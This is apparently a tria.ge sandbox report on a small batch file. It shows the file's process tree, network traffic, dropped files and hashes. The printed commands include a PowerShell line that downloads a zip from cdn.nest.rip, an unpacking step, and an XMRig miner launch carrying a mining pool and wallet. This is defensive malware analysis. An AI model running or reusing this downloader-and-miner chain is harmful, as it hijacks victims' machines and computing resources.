Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    1796s
  • max time network
    1805s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/11/2023, 22:48 UTC

General

  • Target

    tesy - Copy (10).bat

  • Size

    706B

  • MD5

    035f17438f6146d5ac7285b4adfeb370

  • SHA1

    ef83c877367e96073e2b9b841d9c03ece6b1df7e

  • SHA256

    02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

  • SHA512

    49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip", "test1.zip")
2
URLs
exe.dropper

https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip

Signatures

  • XMRig Miner payload 17 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (10).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip', 'test1.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'test1.zip' -DestinationPath '.'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2268
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K start.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exe
        xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1788
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
    1⤵
      PID:3892
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k UnistackSvcGroup
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1184

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      133.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      254.43.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      254.43.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      2.136.104.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.136.104.51.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      cdn.nest.rip
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.nest.rip
      IN A
      Response
      cdn.nest.rip
      IN A
      188.114.96.0
      cdn.nest.rip
      IN A
      188.114.97.0
    • flag-us
      GET
      https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip
      powershell.exe
      Remote address:
      188.114.96.0:443
      Request
      GET /uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip HTTP/1.1
      Host: cdn.nest.rip
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 15 Nov 2023 22:49:43 GMT
      Content-Type: application/octet-stream
      Content-Length: 3331483
      Connection: keep-alive
      Content-Disposition: filename="test1.zip"
      Content-Security-Policy: block-all-mixed-content
      Etag: "95452958f42b1b93f0c887f59d84d19f"
      Last-Modified: Mon, 23 Oct 2023 15:04:10 GMT
      Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
      Vary: Origin
      X-Amz-Request-Id: 1796F4B754F43E86
      X-Content-Type-Options: nosniff
      X-Xss-Protection: 1; mode=block
      X-Amz-Meta-Originaluploader: 1805da94-c7b9-448d-b4b1-b34cd5b75d2b
      Drive: SSD
      CF-Cache-Status: HIT
      Age: 5382
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YOcTwL8pixlFg3Lp2Zno43AujzhLo7wHGMxEFKyfTrbEUhOaKdEoWGnxjh5RoewZUsuugioJQr%2FL%2Bt%2FDHWuU4MUIOlNswmzoM61NsHxvh1yzykyvXjMxN4tPj9wf8HE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 826b0c8e8db7b7b8-AMS
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      0.96.114.188.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      0.96.114.188.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      133.113.22.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.113.22.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.1.85.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.1.85.104.in-addr.arpa
      IN PTR
      Response
      198.1.85.104.in-addr.arpa
      IN PTR
      a104-85-1-198deploystaticakamaitechnologiescom
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.a-0001.a-msedge.net
      g-bing-com.a-0001.a-msedge.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=2B0A7A090C096CF230BF69C30DE46D35; domain=.bing.com; expires=Mon, 09-Dec-2024 22:49:47 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: FF1F7CAD897B4E5B9EF8481C8B8919F8 Ref B: AMS04EDGE3222 Ref C: 2023-11-15T22:49:47Z
      date: Wed, 15 Nov 2023 22:49:46 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2B0A7A090C096CF230BF69C30DE46D35
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 2887E1CCC73A4E68BE9059343F8879B6 Ref B: AMS04EDGE3222 Ref C: 2023-11-15T22:49:47Z
      date: Wed, 15 Nov 2023 22:49:46 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid=
      Remote address:
      204.79.197.200:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2B0A7A090C096CF230BF69C30DE46D35
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 142089E2A2CE4F5A9B1ECB31E081FE5F Ref B: AMS04EDGE3222 Ref C: 2023-11-15T22:49:47Z
      date: Wed, 15 Nov 2023 22:49:46 GMT
    • flag-us
      DNS
      200.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      200.197.79.204.in-addr.arpa
      IN PTR
      Response
      200.197.79.204.in-addr.arpa
      IN PTR
      a-0001a-msedgenet
    • flag-us
      DNS
      pool.hashvault.pro
      xmrig.exe
      Remote address:
      8.8.8.8:53
      Request
      pool.hashvault.pro
      IN A
      Response
      pool.hashvault.pro
      IN A
      45.76.89.70
      pool.hashvault.pro
      IN A
      95.179.241.203
    • flag-us
      DNS
      203.241.179.95.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      203.241.179.95.in-addr.arpa
      IN PTR
      Response
      203.241.179.95.in-addr.arpa
      IN PTR
      95179241203vultrusercontentcom
    • flag-us
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      158.240.127.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      158.240.127.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.126.166.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.126.166.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      17.14.97.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      17.14.97.104.in-addr.arpa
      IN PTR
      Response
      17.14.97.104.in-addr.arpa
      IN PTR
      a104-97-14-17deploystaticakamaitechnologiescom
    • flag-us
      DNS
      135.1.85.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      135.1.85.104.in-addr.arpa
      IN PTR
      Response
      135.1.85.104.in-addr.arpa
      IN PTR
      a104-85-1-135deploystaticakamaitechnologiescom
    • flag-us
      DNS
      119.110.54.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      119.110.54.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      1.208.79.178.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.208.79.178.in-addr.arpa
      IN PTR
      Response
      1.208.79.178.in-addr.arpa
      IN PTR
      https-178-79-208-1amsllnwnet
    • flag-us
      DNS
      126.24.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      126.24.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      240.221.184.93.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.221.184.93.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      11.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      11.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      203.78.101.95.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      203.78.101.95.in-addr.arpa
      IN PTR
      Response
      203.78.101.95.in-addr.arpa
      IN PTR
      a95-101-78-203deploystaticakamaitechnologiescom
    • flag-us
      DNS
      130.109.69.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      130.109.69.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      68.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      68.32.126.40.in-addr.arpa
      IN PTR
      Response
    • 188.114.96.0:443
      https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip
      tls, http
      powershell.exe
      173.9kB
      3.8MB
      2431
      2735

      HTTP Request

      GET https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip

      HTTP Response

      200
    • 204.79.197.200:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid=
      tls, http2
      1.8kB
      9.3kB
      20
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a2037c566b7418db9f2748e8677fb84&localId=w:A8A12FC3-76A6-AC6C-AA30-BB221E4B018A&deviceId=6966556173674516&anid=

      HTTP Response

      204
    • 95.179.241.203:80
      pool.hashvault.pro
      tls
      xmrig.exe
      21.0kB
      58.2kB
      182
      146
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      133.32.126.40.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      133.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      254.43.238.8.in-addr.arpa
      dns
      71 B
      125 B
      1
      1

      DNS Request

      254.43.238.8.in-addr.arpa

    • 8.8.8.8:53
      2.136.104.51.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      2.136.104.51.in-addr.arpa

    • 8.8.8.8:53
      cdn.nest.rip
      dns
      powershell.exe
      58 B
      90 B
      1
      1

      DNS Request

      cdn.nest.rip

      DNS Response

      188.114.96.0
      188.114.97.0

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      0.96.114.188.in-addr.arpa
      dns
      71 B
      133 B
      1
      1

      DNS Request

      0.96.114.188.in-addr.arpa

    • 8.8.8.8:53
      133.113.22.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      133.113.22.20.in-addr.arpa

    • 8.8.8.8:53
      198.1.85.104.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      198.1.85.104.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      158 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      200.197.79.204.in-addr.arpa
      dns
      73 B
      106 B
      1
      1

      DNS Request

      200.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      pool.hashvault.pro
      dns
      xmrig.exe
      64 B
      96 B
      1
      1

      DNS Request

      pool.hashvault.pro

      DNS Response

      45.76.89.70
      95.179.241.203

    • 8.8.8.8:53
      203.241.179.95.in-addr.arpa
      dns
      73 B
      122 B
      1
      1

      DNS Request

      203.241.179.95.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      158.240.127.40.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      158.240.127.40.in-addr.arpa

    • 8.8.8.8:53
      56.126.166.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      56.126.166.20.in-addr.arpa

    • 8.8.8.8:53
      17.14.97.104.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      17.14.97.104.in-addr.arpa

    • 8.8.8.8:53
      135.1.85.104.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      135.1.85.104.in-addr.arpa

    • 8.8.8.8:53
      119.110.54.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      119.110.54.20.in-addr.arpa

    • 8.8.8.8:53
      1.208.79.178.in-addr.arpa
      dns
      71 B
      116 B
      1
      1

      DNS Request

      1.208.79.178.in-addr.arpa

    • 8.8.8.8:53
      126.24.238.8.in-addr.arpa
      dns
      71 B
      125 B
      1
      1

      DNS Request

      126.24.238.8.in-addr.arpa

    • 8.8.8.8:53
      240.221.184.93.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      240.221.184.93.in-addr.arpa

    • 8.8.8.8:53
      11.227.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      11.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      203.78.101.95.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      203.78.101.95.in-addr.arpa

    • 8.8.8.8:53
      130.109.69.13.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      130.109.69.13.in-addr.arpa

    • 8.8.8.8:53
      68.32.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      68.32.126.40.in-addr.arpa

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      143a478fb47996f74bbbcdaa252b9e0b

      SHA1

      288893a45c1c50f8245a32aa06dfb1ac2ff31c83

      SHA256

      6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b

      SHA512

      e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y25g0two.014.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\test1.zip

      Filesize

      3.2MB

      MD5

      95452958f42b1b93f0c887f59d84d19f

      SHA1

      c861dc457d57471ab42879f49cc8fe171e7c9b1c

      SHA256

      dc24f4d37898468e34bee09afdcb7e1fc681ecbac667bc8eb3c62d035c0fd255

      SHA512

      96207cb7d6cb2977acfbc5e9f507fe0b1b43a5041e5ea50c63f4f7db620fa14512066781c306ba123b0e6aafbb048c4b042f5fdb21e97a48a536acd783b2e072

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\start.cmd

      Filesize

      278B

      MD5

      080123b6eac4a332d3f2b11f6eb3aa54

      SHA1

      8f3d40eae881e3b871cff2aa85521d727ada2a64

      SHA256

      cd7f2c4251361d8e83bc1857767c6eb20d305605ca78418aca3af439ff7d41e2

      SHA512

      0c5033e8a72a924d360bec1b1304889b23dea6a514cd18b055824c19d440a2875472ba70202efb4b7b636398ebd114b365ce88ca18b88a129588639c26d62d8c

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exe

      Filesize

      7.9MB

      MD5

      4813fa6d610e180b097eae0ce636d2aa

      SHA1

      1e9cd17ea32af1337dd9a664431c809dd8a64d76

      SHA256

      9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc

      SHA512

      5463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa

    • memory/1184-111-0x000002090FD10000-0x000002090FD11000-memory.dmp

      Filesize

      4KB

    • memory/1184-112-0x000002090FD00000-0x000002090FD01000-memory.dmp

      Filesize

      4KB

    • memory/1184-109-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-108-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-107-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-68-0x0000020907A40000-0x0000020907A50000-memory.dmp

      Filesize

      64KB

    • memory/1184-106-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-105-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-104-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-110-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-103-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-114-0x000002090FD10000-0x000002090FD11000-memory.dmp

      Filesize

      4KB

    • memory/1184-117-0x000002090FD00000-0x000002090FD01000-memory.dmp

      Filesize

      4KB

    • memory/1184-102-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-101-0x000002090FFE0000-0x000002090FFE1000-memory.dmp

      Filesize

      4KB

    • memory/1184-100-0x000002090FFC0000-0x000002090FFC1000-memory.dmp

      Filesize

      4KB

    • memory/1184-84-0x0000020907B40000-0x0000020907B50000-memory.dmp

      Filesize

      64KB

    • memory/1788-56-0x0000023352260000-0x0000023352280000-memory.dmp

      Filesize

      128KB

    • memory/1788-51-0x0000023352260000-0x0000023352280000-memory.dmp

      Filesize

      128KB

    • memory/1788-53-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-54-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-55-0x00000233E4C40000-0x00000233E4C60000-memory.dmp

      Filesize

      128KB

    • memory/1788-47-0x0000023350710000-0x0000023350730000-memory.dmp

      Filesize

      128KB

    • memory/1788-57-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-58-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-59-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-60-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-61-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-62-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-63-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-64-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-65-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-66-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-67-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-52-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-50-0x00000233E4C40000-0x00000233E4C60000-memory.dmp

      Filesize

      128KB

    • memory/1788-49-0x00007FF641FE0000-0x00007FF642AE3000-memory.dmp

      Filesize

      11.0MB

    • memory/1788-48-0x0000023352220000-0x0000023352260000-memory.dmp

      Filesize

      256KB

    • memory/1944-17-0x00007FFDF36B0000-0x00007FFDF4171000-memory.dmp

      Filesize

      10.8MB

    • memory/1944-1-0x0000017667D10000-0x0000017667D20000-memory.dmp

      Filesize

      64KB

    • memory/1944-2-0x0000017667D10000-0x0000017667D20000-memory.dmp

      Filesize

      64KB

    • memory/1944-0-0x00007FFDF36B0000-0x00007FFDF4171000-memory.dmp

      Filesize

      10.8MB

    • memory/1944-8-0x0000017667CB0000-0x0000017667CD2000-memory.dmp

      Filesize

      136KB

    • memory/1944-13-0x0000017667D10000-0x0000017667D20000-memory.dmp

      Filesize

      64KB

    • memory/2268-33-0x0000027068020000-0x0000027068032000-memory.dmp

      Filesize

      72KB

    • memory/2268-19-0x00007FFDF36B0000-0x00007FFDF4171000-memory.dmp

      Filesize

      10.8MB

    • memory/2268-20-0x00000270659B0000-0x00000270659C0000-memory.dmp

      Filesize

      64KB

    • memory/2268-21-0x00000270659B0000-0x00000270659C0000-memory.dmp

      Filesize

      64KB

    • memory/2268-32-0x00000270659B0000-0x00000270659C0000-memory.dmp

      Filesize

      64KB

    • memory/2268-34-0x0000027067CB0000-0x0000027067CBA000-memory.dmp

      Filesize

      40KB

    • memory/2268-43-0x00007FFDF36B0000-0x00007FFDF4171000-memory.dmp

      Filesize

      10.8MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.